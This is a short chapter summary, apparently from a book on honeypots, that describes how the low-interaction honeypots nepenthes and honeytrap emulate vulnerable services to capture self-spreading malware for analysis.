6.5. Summary

In this chapter, we have introduced the virtual honeypot tools nepenthes and honeytrap. These low-interaction honeypots allows us to learn more about autonomous spreading malware. The basic principle behind these tool is simple: We just emulate the parts of a service that are used by an exploit. But by cleverly implementing this technique, we can extract enough information about an incoming exploit to learn more about the propagation mechanism. This allows us to then automatically download malware. We have thus used the basic principle of honeypots and are now able to automatically collect malware in a nonnative environment. After all, nepenthes and honeytrap run on Linux and BSD systems, and therefore a downloaded bot that is written for Windows cannot harm the machine. Our empirical results show that this approach is viable, and we have presented the lessons we have learned during the development and testing processes.